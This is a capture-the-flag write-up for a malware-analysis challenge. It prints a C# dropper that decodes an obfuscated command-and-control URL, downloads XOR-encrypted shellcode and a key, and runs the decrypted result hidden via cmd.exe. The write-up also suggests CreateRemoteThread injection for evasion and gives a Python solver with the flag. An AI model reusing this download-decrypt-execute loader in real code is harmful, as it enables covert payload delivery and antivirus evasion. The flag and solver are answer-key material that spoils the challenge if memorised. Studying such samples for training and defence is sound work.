We have installed the newest anti-virus on our systems, however this piece of malware managed to evade our detections, maybe we should invest more into dynamic analysis.
Background Knowledge
Similar to , this challenge heavily relies on prior knowledge of techniques used by malware developers and encryption.
This challenge utilizes two endpoints on the C2 server,
The first endpoint is used to retrieve encrypted shellcode to be executed by the victim.
The second endpoint is used to decrypt the shellcode.
This technique is used to evade signature-based analysis by AV, ensuring that even if artifacts of the shellcode is found on the system, the defender will not be able to reverse engineer the payload.
You can read more about this .
Solution
The player is given an agent.cs
agent.cs
using System;
using System.Net;
using System.Text.Json;
class Program
{
static void Main(string[] args)
{
string s = "";
string[] a = new string[] { "ht", "tp", ":", "/", "/", "1", "5", "7", ".", "2", "3", "0", ".", "2", "5", "1", ".", "0", ":", "6", "0", "0", "1", "/", "s", "h", "e", "l", "l", "c", "o", "d", "e" };
foreach (string c in a)
{
s += new string(new char[] { (char)(Convert.ToInt32(c, 16) - 2) });
}
string shellcode = new WebClient().DownloadString(s);
s = "";
a = new string[] { "ht", "tp", ":", "/", "/", "1", "5", "7", ".", "2", "3", "0", ".", "2", "5", "1", ".", "0", ":", "6", "0", "0", "1", "/", "k", "e", "y" };
foreach (string c in a)
{
s += new string(new char[] { (char)(Convert.ToInt32(c, 16) - 2) });
}
string keyJson = new WebClient().DownloadString(s);
var keyObject = JsonSerializer.Deserialize<KeyObject>(keyJson);
string key = keyObject.key;
int keyLength = keyObject.key_length;
string command = Haxor(shellcode, key);
using (var process = new System.Diagnostics.Process())
{
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = $"/C {command}";
process.StartInfo.CreateNoWindow = true;
process.Start();
}
}
static string Haxor(string a, string b)
{
int c = a.Length;
char[] d = new char[c];
for (int i = 0; i < c; ++i)
{
d[i] = (char)(a[i] ^ b[i % b.Length]);
}
return new string(d);
}
class KeyObject
{
public string key { get; set; }
public int key_length { get; set; }
}
}
Wow, this malware developer is not very good at hiding the C2 server, you can eye-power the string[a] value by mentally adding together the link.
string command = Haxor(shellcode, key);
...
static string Haxor(string a, string b)
{
int c = a.Length;
char[] d = new char[c];
for (int i = 0; i < c; ++i)
{
d[i] = (char)(a[i] ^ b[i % b.Length]);
}
return new string(d);
}
It seems like the shellcode is being XOR'ed against the key via the function called "Haxor".
For the more experienced malware developers, please don't mind my wrongful usage of cmd.exe to execute shellcode- I was very sleepy when making this challenge.
The shellcode should be executed via other techniques (e.g CreateRemoteThread, etc)
The challenge solution is simply to find the raw shellcode, which in this case is actually a string (it should be injectable-asm)
solution.py
import requests
def xor(data, key):
return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))
def decrypt(data, key):
return xor(data, key)
if __name__ == '__main__':
key = requests.get("http://157.230.251.0:6001/key").json()['key']
shellcode = requests.get("http://157.230.251.0:6001/shellcode").text
plaintext = decrypt(shellcode, key)
print(plaintext)
# Flag: CTF101{Do3s_xOr_evaDE_Av?} ...